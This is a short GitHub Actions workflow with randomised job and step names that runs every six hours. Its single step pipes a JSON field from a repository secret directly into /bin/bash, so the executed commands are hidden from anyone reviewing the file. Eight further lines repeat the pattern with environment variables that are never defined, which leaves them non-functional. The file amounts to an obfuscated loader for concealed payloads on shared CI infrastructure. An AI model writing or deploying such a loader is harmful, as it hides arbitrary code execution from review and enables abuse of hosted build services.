name: yetuna7816
on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yetuna7816
        env:
          zflg4: ${{ secrets.zflg4 }}
        run: |
          echo $zflg4 | jq -r .g12 | /bin/bash
          echo $qbnu3872 | jq -r .addiy2 | /bin/bash
          echo $lfkf7 | jq -r .aua6918 | /bin/bash
          echo $qg3 | jq -r .l1 | /bin/bash
          echo $tytkw54 | jq -r .dipna9 | /bin/bash
          echo $uth847 | jq -r .sk505 | /bin/bash
          echo $gpn0951 | jq -r .rek397 | /bin/bash
          echo $oa1396 | jq -r .ay295 | /bin/bash
          echo $befzt83837 | jq -r .hptjh1 | /bin/bash

